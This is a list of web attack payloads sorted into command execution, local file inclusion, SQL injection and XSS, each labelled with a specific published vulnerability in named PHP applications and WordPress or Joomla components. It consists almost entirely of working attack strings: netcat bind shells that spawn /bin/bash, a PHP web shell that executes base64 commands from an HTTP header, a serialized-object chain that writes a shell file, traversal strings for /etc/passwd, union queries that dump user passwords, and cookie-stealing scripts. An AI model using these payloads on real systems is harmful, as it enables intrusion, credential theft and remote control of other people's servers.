# ----------------------------------------------------------------------
# command execution (9)
# ----------------------------------------------------------------------

# Narcissus Remote Command Execution Vulnerability
|uname%20-a

# AjaXplorer checkInstall.php Remote Command Execution
||id

# Invision Power Board <= 3.3.4 'unserialize()' PHP Code Execution
<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>

# ViArt Shop Enterprise 4.1 Arbitrary Command Execution
..%2F..%2F..%2F..%2F..%2Fpwd

# phptax 0.8 <= Remote Code Execution Vulnerability
xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;

# Tiki Wiki CMS Groupware <= 8.3 'unserialize()' PHP Code Execution
O%3A29%3A%22Zend_Pdf_ElementFactory_Proxy%22%3A1%3A%7Bs%3A39%3A%22%2500Zend_Pdf_ElementFactory_Proxy%2500_factory%22%3BO%3A51%3A%22Zend_Search_Lucene_Index_SegmentWriter_StreamWriter%22%3A5%3A%7Bs%3A12%3A%22%2500%2A%2500_docCount%22%3Bi%3A1%3Bs%3A8%3A%22%2500%2A%2500_name%22%3Bs%3A3%3A%22foo%22%3Bs%3A13%3A%22%2500%2A%2500_directory%22%3BO%3A47%3A%22Zend_Search_Lucene_Storage_Directory_Filesystem%22%3A1%3A%7Bs%3A11%3A%22%2500%2A%2500_dirPath%22%3Bs%3A11%3A%22%2FFOOsh.php%2500%22%3B%7Ds%3A10%3A%22%2500%2A%2500_fields%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A34%3A%22Zend_Search_Lucene_Index_FieldInfo%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bs%3A90%3A%22%3C%3Fphp+error_reporting%280%29%3B+print%28___%29%3B+passthru%28base64_decode%28%24_SERVER%5BHTTP_CMD%5D%29%29%3B+die%3B+%3F%3E%22%3B%7D%7Ds%3A9%3A%22%2500%2A%2500_files%22%3BO%3A8%3A%22stdClass%22%3A0%3A%7B%7D%7D%7D

# Basilic 1.5.14 diff.php Arbitrary Command Execution
%26nc%20-ltp4444%20-e%20/bin/bash

# Breeze CMS 1.0 => Remote Code Execution Vulnerability
t{};%20class%20t{};passthru(ls);//

# Social Groupie (create_album.php) Remote File Upload Vulnerability
shell.jpg

# ----------------------------------------------------------------------
# local file inclusion (9)
# ----------------------------------------------------------------------

# BabyGekko 1.2.2e LFI Vulnerability
../../../../../../../tmp/
 
# Joomla Component com_p2dxt Local File Include Vulnerability
../../../../etc/passwd%00

# PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability
../../../../../../windows/win.ini

# WeBid <= 1.0.5 Directory Traversal Vulnerability
../../../../../../../../../../etc/passwd%00.js;

Bitweaver 2.8.1 LFI Vulnerability
..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

# TomatoCart 1.2.0 Alpha 2 Local File Inclusion Vulnerability
../../../../../../../../../../../../../../boot.ini%00

# 2Point Solutions - Multiple Vulnerabilities
/../../../../../../..//etc/passwd%00../../../../../../../

# Xivo 1.2 Arbitrary File Download Vulnerability
../../../../etc/asterisk/cel_pgsql.conf

# TSP 0.1d Multiple File Inclusion Vulnerabilities 
../../../../../../../../../../../../../../../../etc/passwd%00

# ----------------------------------------------------------------------
# SQL injection (13)
# ----------------------------------------------------------------------

# ES CmS 0.1 SQL Injection Vulnerability
id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.c​olumns+where+table_name=char(table_cod)

# WordPress - PICA Photo Gallery Automatic SQL Injection
-1+union+select+concat(user_login,0x3a,user_pass,0x3a,user_email),2,3,4+from+wp_users-

# Free Hosting Manager V2.0 SQL Injection Vulnerability
-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23

# friendsinwar FAQ Manager SQL Injection Vulnerability
-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--

# LikeItNow Script SQL Injection Vulnerability
-1+UNION+SELECT+1,version(),3--

# Web Colinas Sql Injection Vulnerability
-3/*!20000union*/+/*!20000SelEct*/%201,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--

# dotProject 2.1.6 Cross Site Scripting / SQL Injection
%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8,9,10,11%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202

# Wordpress Plugin plg_novana Sql Injection Vulnerability
-111+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--

SmartCMS SQL Injection Vulnerability
123+AND+1=2+UNION+ALL+SELECT+version()--

# Joomla Component com_quiz SQL Injection Vulnerability
{RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,concat(username,0x3D,password)/**/from/**/jos_users+--+

# WordPress Cardoza Ajax Search 1.1 SQL Injection Vulnerability
'or%201=1--%20

# YCommerce Pro / Reseller SQL Injection Vulnerability
1+union+all+select+1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5+from+information_schema.columns+where+table_schema!=0x696E666F726D6174696F6E5F736368656D61--

# ----------------------------------------------------------------------
# XSS / CSRF (9)
# ----------------------------------------------------------------------

# AionWeb Cross Site Scripting Vulnerability
%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

# MYREphp Vacation Rental Software Cross Site Scripting Vulnerability
%27%20onmouseover%3dprompt%28900153%29%20bad%3d%27

# Greenstone Digital Library Cross Site Scripting Vulnerability
%22%3E%3Cscript%3Ealert%28%22Again%20Owned%22%29;%3C/script%3E

# ClipBucket 2.6 Cross Site Scripting Vulnerability
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x005B39)%3C/script%3E

# ATutor 1.2 Cross Site Scripting Vulnerability
%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

# Jara 1.6 Cross Site Scripting Vulnerability
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E

# Bitweaver 2.8.1 Cross Site Scripting Vulnerability
%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E

# CheckPoint/Sofaware Firewall XSS
\"><script>alert(1)</script>&mask=000&swpreview=1

# Wordpress WP-FaceThumb Gallery Plugin <= 0.1 Reflected XSS Vulnerability 
1\"><img/src=x+onerror=alert(document.cookie)>
